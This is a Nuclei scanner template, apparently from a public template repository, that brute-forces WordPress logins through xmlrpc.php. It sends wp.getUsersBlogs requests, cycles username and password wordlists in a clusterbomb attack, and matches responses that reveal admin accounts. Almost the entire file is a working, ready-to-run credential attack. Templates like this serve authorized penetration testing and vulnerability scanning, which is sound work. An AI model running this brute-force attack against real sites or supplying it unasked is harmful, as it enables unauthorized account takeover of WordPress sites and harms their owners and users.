nuclei-templates/vulnerabilities/wordpress/wp-xmlrpc-brute-force.yaml

51 lines
1.3 KiB
YAML

id: wordpress-xmlrpc-brute-force
info:
name: Wordpress XMLRPC.php username and password Bruteforcer
author: Exid
severity: high
description: This template bruteforces username and passwords through xmlrpc.php being available.
reference:
- https://bugdasht.ir/reports/3c6841c0-ae4c-11eb-a510-517171a9198c
- https://www.acunetix.com/vulnerabilities/web/wordpress-xml-rpc-authentication-brute-force/
tags: wordpress,php,xmlrpc,fuzz
requests:
- raw:
- |
POST /xmlrpc.php HTTP/1.1
Host: {{Hostname}}
Content-Length: 235
<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param>
<value>{{username}}</value>
</param>
<param>
<value>{{password}}</value>
</param>
</params>
</methodCall>
attack: clusterbomb
payloads:
username: helpers/wordlists/wp-users.txt
password: helpers/wordlists/wp-passwords.txt
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- 'url'
- 'xmlrpc'
- 'isAdmin'
condition: and